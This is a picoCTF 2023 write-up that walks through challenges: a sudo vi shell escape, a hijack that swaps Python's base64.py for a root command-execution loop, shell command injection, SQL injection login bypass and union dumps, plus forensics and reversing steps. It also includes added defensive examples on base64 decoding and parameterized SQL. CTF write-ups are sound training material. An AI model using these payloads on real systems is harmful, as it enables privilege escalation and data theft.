# picoCTF 2023 Writeup

## Binary Exploitation

### hijacking

AUTHOR: THEONESTE BYAGUTANGAZA

Description

Getting root access can allow you to read the flag. Luckily there is a python file that you might like to play with. Through Social engineering, we've got the credentials to use on the server. SSH is running on the server.

#### Poking around

![](https://hackmd.io/_uploads/BkCIB9eLh.png)

The `/challenge` directory looks suspicious, but we cannot `cd` into it.

![](https://hackmd.io/_uploads/BJpdBcgIn.png)

Checking the sudo configuration shows that this user is allowed to run `vi` with sudo.

![](https://hackmd.io/_uploads/Hy6NrclIn.png)

#### exploit

```shell=
sudo vi
:shell
```

![](https://hackmd.io/_uploads/rkEI89xI3.png)

That is privilege escalation done; now just go into `/challenge/` and fetch the flag.

![](https://hackmd.io/_uploads/rkETIce8h.png)

>picoCTF{pYth0nn_libraryH!j@CK!n9_5a7b5866}

#### Original solution

When I first solved this, I tampered with the `base64` module that `.server.py` imports. For some reason, while writing this writeup, I could no longer run `.server.py` as root.

`ls -al` reveals a hidden `.server.py`; `cat .server.py`:

```python=
import base64
import os
import socket

ip = 'picoctf.org'
response = os.system("ping -c 1 " + ip)  # saving ping details to a variable
host_info = socket.gethostbyaddr(ip)     # getting the IP from a domain
host_info_to_str = str(host_info[2])
host_info = base64.b64encode(host_info_to_str.encode('ascii'))
print("Hello, this is a part of information gathering", 'Host: ', host_info)
```

`vim .server.py` cannot change `.server.py` because it is read-only, but the permissions on `base64.py` were not locked down.

**Tamper with the imported file**

`vim /usr/lib/python3.8/base64.py`

```python=
import os

while 1:
    cmd = input()
    print(os.popen(cmd).read())
```

**get shell**

```shell=
sudo python3 .server.py
```

## Forensics

### hideme

AUTHOR: GEOFFREY NJOGU

Description

Every file gets a flag. The SOC analyst saw one image been sent back and forth between two people. They decided to investigate and found out that there was more than what meets the eye here.
The download is an image that looks perfectly normal. `exiftool` shows no flag hidden in any metadata field, so try `strings flag.png`:

![](https://hackmd.io/_uploads/BkC8pqxIn.png)

There is something inside that looks a lot like a file path. Treat `flag.png` as a zip archive and extract it:

```shell=
unzip flag.png
```

Out comes the flag image:

![](https://hackmd.io/_uploads/r1xCia5lI2.png)

>picoCTF{Hiddinng_An_imag3_within_@n_ima9e_92076717}

### FindAndOpen

AUTHOR: MUBARAK MIKAIL

Description

Someone might have hidden the password in the trace file. Find the key to unlock this file. This tracefile might be good to analyze.

Two files are given: `flag.zip` and `dump.pcap`. Trying to extract `flag.zip` shows that it needs a password.

#### Start with `dump.pcap`

Open `dump.pcap` in Wireshark:

![](https://hackmd.io/_uploads/r11qn2eL2.png)

Browsing a few packets shows they all carry plaintext:

![](https://hackmd.io/_uploads/SyH7T2lUh.png)

One packet is very suspicious: its payload ends in `=`, which is most likely base64 padding. Decoding it gives the first half of the flag:

>This is the secret: picoCTF{R34DING_LOKd_

Back to `flag.zip`: just guess and use that first fragment of the flag as the password.

>picoCTF{R34DING_LOKd_fil56_succ3ss_5ed3a878}

??

## General Skills

### money-ware

AUTHOR: JUNI19

Description

Flag format: picoCTF{Malwarename} The first letter of the malware name should be capitalized and the rest lowercase. Your friend just got hacked and has been asked to pay some bitcoins to 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is going on and asks you for advice. Can you identify what malware he’s being a victim of?

Googling `1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX` turns up [a CNBC news article](https://www.cnbc.com/2017/06/28/ransomware-cyberattack-petya-bitcoin-payment.html):

![](https://hackmd.io/_uploads/SkJ-yplUn.png)

>picoCTF{Petya}

Trivial.

### repetitions

AUTHOR: THEONESTE BYAGUTANGAZA

Description

Can you make sense of this file? Download the file here.
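The two base64 steps on this page, spotting a `=`-terminated token in plaintext packet payloads (FindAndOpen above) and decoding a value that has been base64-encoded several times over (repetitions, below), as one added example that is not part of the original writeup. The packet payload and the nested secret are constructed here; the helper refuses to decode anything that is not strictly valid base64, so it stops by itself once the innermost layer is plaintext.

```python
import base64
import binascii
import re

# Runs of base64 alphabet with optional padding; 16 chars is an assumed minimum
B64_TOKEN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")

def looks_like_base64(token):
    """Strict check: correct length, only alphabet characters, valid padding."""
    if len(token) < 8 or len(token) % 4:
        return False
    try:
        base64.b64decode(token, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False

def extract_tokens(payload):
    """Pull base64-looking tokens out of a raw packet payload (bytes)."""
    return [t for t in B64_TOKEN.findall(payload) if looks_like_base64(t)]

def peel(token, max_layers=20):
    """Decode repeatedly while the result is still base64; return (layers, final)."""
    cur = token.encode() if isinstance(token, str) else token
    layers = 0
    while layers < max_layers:
        candidate = re.sub(rb"\s+", b"", cur)  # the repetitions file has newlines
        if not looks_like_base64(candidate):
            break
        cur = base64.b64decode(candidate, validate=True)
        layers += 1
    return layers, cur

def demo():
    """Constructed payload: a note carrying a 4x base64-wrapped secret."""
    secret = b"constructed: not the real flag"
    wrapped = secret
    for _ in range(4):
        wrapped = base64.b64encode(wrapped)
    payload = b"HTTP/1.1 200 OK\r\n\r\nThis is the note: " + wrapped + b"\r\n"
    return [peel(t) for t in extract_tokens(payload)]
```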
Download `enc_flag`:

```=
VmpGU1EyRXlUWGxTYmxKVVYwZFNWbGxyV21GV1JteDBUbFpPYWxKdFVsaFpWVlUxWVZaS1ZWWnVh
RmRXZWtab1dWWmtSMk5yTlZWWApiVVpUVm10d1VWZFdVa2RpYlZaWFZtNVdVZ3BpU0VKeldWUkNk
MlZXVlhoWGJYQk9VbFJXU0ZkcVRuTldaM0JZVWpGS2VWWkdaSGRXCk1sWnpWV3hhVm1KRk5XOVVW
VkpEVGxaYVdFMVhSbFZhTTBKWVZGWmFXbVZzV2tkWk0yaFRDbUpXV25sVVZtaFRWMGRHZEdWRlZs
aGkKYlRrelZERldUMkpzUWxWTlJYTkxDZz09Cg==
```

Classic base64. After decoding:

```=
VjFSQ2EyTXlSblJUV0dSVllrWmFWRmx0TlZOalJtUlhZVVU1YVZKVVZuaFdWekZoWVZkR2NrNVVX
bUZTVmtwUVdWUkdibVZXVm5WUgpiSEJzWVRCd2VWVXhXbXBOUlRWSFdqTnNWZ3BYUjFKeVZGZHdW
MlZzVWxaVmJFNW9UVVJDTlZaWE1XRlVaM0JYVFZaWmVsWkdZM2hTCmJWWnlUVmhTV0dGdGVFVlhi
bTkzVDFWT2JsQlVNRXNLCg==
```

Decode again:

```=
V1RCa2MyRnRTWGRVYkZaVFltNVNjRmRXYUU5aVJUVnhWVzFhYVdGck5UWmFSVkpQWVRGbmVWVnVR
bHBsYTBweVUxWmpNRTVHWjNsVgpXR1JyVFdwV2VsUlZVbE5oTURCNVZXMWFUZ3BXTVZZelZGY3hS
bVZyTVhSWGFteEVXbm93T1VOblBUMEsK
```

And again:

```=
WTBkc2FtSXdUbFZTYm5ScFdWaE9iRTVxVW1aaWFrNTZaRVJPYTFneVVuQlpla0pyU1ZjME5GZ3lV
WGRrTWpWelRVUlNhMDB5VW1aTgpWMVYzVFcxRmVrMXRXamxEWnowOUNnPT0K
```

And again:

```=
Y0dsamIwTlVSbnRpWVhObE5qUmZiak56ZEROa1gyUnBZekJrSVc0NFgyUXdkMjVzTURSa00yUmZN
V1V3TW1Fek1tWjlDZz09Cg==
```

And again:

```=
cGljb0NURntiYXNlNjRfbjNzdDNkX2RpYzBkIW44X2Qwd25sMDRkM2RfMWUwMmEzMmZ9Cg==
```

One more time:

```=
picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f}
```

![](https://media.tenor.com/eipo4TRTSKwAAAAd/moe-simpsons-barney-e-moe.gif)

>picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f}

### Permissions

AUTHOR: GEOFFREY NJOGU

Description

Can you read files in the root file? The system admin has provisioned an account for you on the main server: ssh -p 53849 picoplayer@saturn.picoctf.net Password: x+T6aPgE4- Can you login and read the root file?

![](https://hackmd.io/_uploads/B1xxDTeI2.png)

>picoCTF{uS1ng_v1m_3dit0r_f6ad392b}

Trivial.

### chrono

AUTHOR: MUBARAK MIKAIL

Description

How to automate tasks to run at intervals on linux servers?
Use ssh to connect to this server: Server: saturn.picoctf.net Port: 50602 Username: picoplayer Password: tPmsUpiHeZ

![](https://hackmd.io/_uploads/ByLMuagIn.png)

>picoCTF{Sch3DUL7NG_T45K3_L1NUX_0bb95b71}

?

### useless

AUTHOR: LOIC SHEMA

Description

There's an interesting script in the user's home directory Additional details will be available after launching your challenge instance.

![](https://hackmd.io/_uploads/HkhIYaeIn.png)

>picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_6173}

### Special

AUTHOR: LT 'SYREAL' JONES

Description

Don't power users get tired of making spelling mistakes in the shell? Not anymore! Enter Special, the Spell Checked Interface for Affecting Linux. Now, every word is properly spelled and capitalized... automatically and behind-the-scenes! Be the first to test Special in beta, and feel free to tell us all about how Special streamlines every development process that you face. When your co-workers see your amazing shell interface, just tell them: That's Special (TM) Start your instance to see connection details. Additional details will be available after launching your challenge instance.

This shell keeps rewriting whatever command you type into a simple dictionary word and capitalizes its first letter: `ls` becomes `Is`, `cat` becomes `Cat`. Only the first letter of the line is capitalized, so `cat` still works when it is not the first word. Use `;` together with a `*` wildcard for command injection:

```shell=
cat;cat *
```

![](https://hackmd.io/_uploads/SJMKTpxLh.png)

There is a directory named `blargh` in the current directory:

```shell=
cat;cat blargh/*
```

![](https://hackmd.io/_uploads/SyasaagIn.png)

>picoCTF{5p311ch3ck_15_7h3_w0r57_f578af59}

## Reverse Engineering

### Reverse

AUTHOR: MUBARAK MIKAIL

Description

Try reversing this file? Can ya? I forgot the password to this file. Please find it for me?
The challenge gives a binary `ret` that asks for a password when run:

![](https://hackmd.io/_uploads/H1IQkCgU2.png)

Load it in GDB:

```shell=
start
c
ctrl^C
ni   # keep single-stepping with ni until the strcmp call
```

![](https://hackmd.io/_uploads/SJHUe0eL3.png)

When `strcmp` is called to compare the password, dump `rsi` to get the first part of the flag:

>picoCTF{3lf_r3v3r5ing_succe55ful_9ae8528

Re-run `ret` and enter that as the password:

![](https://hackmd.io/_uploads/HJwZb0l83.png)

>picoCTF{3lf_r3v3r5ing_succe55ful_9ae85289}

## Web Exploitation

### More SQLi

AUTHOR: MUBARAK MIKAIL

Description

Can you find the flag on this website. Additional details will be available after launching your challenge instance.

#### Bypass login

The site opens on a classic login form:

![](https://hackmd.io/_uploads/SkQs-CeL3.png)

```sql=
username=admin&
password=' or 'a'='a
```

![](https://hackmd.io/_uploads/HJnefAeU2.png)

The challenge helpfully prints the `query` for you. Adjust it a little:

```sql=
username=123&
password=' or 1=1;--
```

After logging in there is a search page:

![](https://hackmd.io/_uploads/SkTYRu-Uh.png)

#### Find the number of columns

```sql=
searchInput=' union select 1,2,3;--
```

![](https://hackmd.io/_uploads/ByxzS0uW83.png)

#### Dump the table

```sql=
searchInput=' or 'a'='a
```

![](https://hackmd.io/_uploads/BJwUJt-Ln.png)

No `flag` here; it is probably in another `table`:

```sql=
' union select group_concat(sql),2,3 from sqlite_master WHERE type='table';--
```

![](https://hackmd.io/_uploads/SkJ-xt-83.png)

Now we know the `flag` should be in the `flag` column (declared `flag TEXT`) of `more_table`:

```sql=
' union select flag,2,3 from more_table;--
```

![](https://hackmd.io/_uploads/B16UGtZ82.png)

>picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_3b0fca37}

### MatchTheRegex

AUTHOR: SUNDAY JACOB NWANYIM

Description

How about trying to match a regular expression Additional details will be available after launching your challenge instance.

Without reading the hint I had no idea what to do at first.

![](https://hackmd.io/_uploads/rk36rFZ8h.png)

It turns out you need to match `^p.....F!?`:

![](https://hackmd.io/_uploads/SyhyLF-Uh.png)

![](https://hackmd.io/_uploads/S1jOSFbLn.png)

>picoCTF{succ3ssfully_matchtheregex_9080e406}

The easiest problem of the century.

### findme

AUTHOR: GEOFFREY NJOGU

Description

Help us test the form by submiting the username as test and password as test!
Additional details will be available after launching your challenge instance.

First log in with `test` / `test!`:

![](https://hackmd.io/_uploads/S1Q0_t-U2.png)

Once inside, the page says *I was redirected here by a friend of mine but i couldnt find anything. Help me search for flags :-)*

![](https://hackmd.io/_uploads/SyiWKKbU3.png)

#### Use `BurpSuite` to inspect the redirected pages

![](https://hackmd.io/_uploads/SkjKtK-L2.png)

The `id` parameter looks like classic base64:

![](https://hackmd.io/_uploads/ryteqKbUh.png)

![](https://hackmd.io/_uploads/HJZycFWLh.png)

>picoCTF{proxies_all_the_way_be716d8e}
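Looking back at More SQLi: an added example, not from the writeup or the challenge's own source, showing why the `' or 'a'='a` login bypass works against a query built by string concatenation and fails against the same query with bound parameters. The in-memory sqlite database, its `users` rows and its `more_table` contents are all constructed here.

```python
import sqlite3

def make_db():
    """Constructed in-memory database shaped like the challenge's (sample data only)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'constructed-admin-pw');
        CREATE TABLE more_table (flag TEXT);
        INSERT INTO more_table VALUES ('constructed-not-the-flag');
    """)
    return db

def login_vulnerable(db, username, password):
    """String concatenation: a quote in `password` closes the literal and the
    rest of the input is parsed as SQL, so `' or 'a'='a` makes every row match."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchone() is not None

def login_parameterized(db, username, password):
    """Placeholders: the input is bound as data and never parsed as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None

def demo():
    """Run the page's first payload against both versions."""
    db = make_db()
    payload = "' or 'a'='a"
    return {
        "vuln_bypassed": login_vulnerable(db, "123", payload),
        "param_bypassed": login_parameterized(db, "123", payload),
        "param_valid_login": login_parameterized(db, "admin", "constructed-admin-pw"),
    }
```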